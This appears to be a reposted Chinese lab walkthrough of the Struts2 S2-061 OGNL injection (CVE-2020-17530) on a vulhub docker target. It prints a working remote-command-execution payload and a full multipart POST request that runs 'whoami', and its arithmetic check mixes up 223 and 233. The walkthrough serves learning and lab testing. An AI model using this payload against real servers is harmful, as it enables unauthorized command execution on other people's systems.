前言
Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。
一、启动靶机
复制代码
1
2docker-compose build
复制代码
1
2docker-compose up -d
二、构造payload
复制代码
1
2%25{(223*223)}
复制代码
1
2view-source:http://192.168.150.146:8080/index.action?id=%25{(223*223)}
访问 view-source:http://192.168.150.146:8080/index.action?id=%25{(223*223)},可以发现233*233的结果被解析到了id属性中:
访问http://192.168.150.146:8080/index.action?id=1,改换POST方法,然后改变body encoding。
(#arglist.add(“id”))中为执行命令
复制代码
1
2%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
将POST Content替换为上面payload
请求:
复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20POST /index.action HTTP/1.1 Host: 192.168.150.146:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: wordpress_test_cookie=WP+Cookie+check; cZZ_visitedfid=2; cZZ_sid=i4JJSc; JSESSIONID=node04ktcvvnsf8cb1qpwk658y2ajo0.node0 Connection: close Content-Type: multipart/form-data; boundary=--------352899813 Content-Length: 793 ----------352899813 Content-Disposition: form-data; name="id" %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))} ----------352899813--
三、发送payload
参考:
https://github.com/vulhub/vulhub/blob/master/struts2/s2-061/README.zh-cn.md
最后
以上就是舒适金鱼最近收集整理的关于【vulhub】Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)的全部内容,更多相关【vulhub】Struts2内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复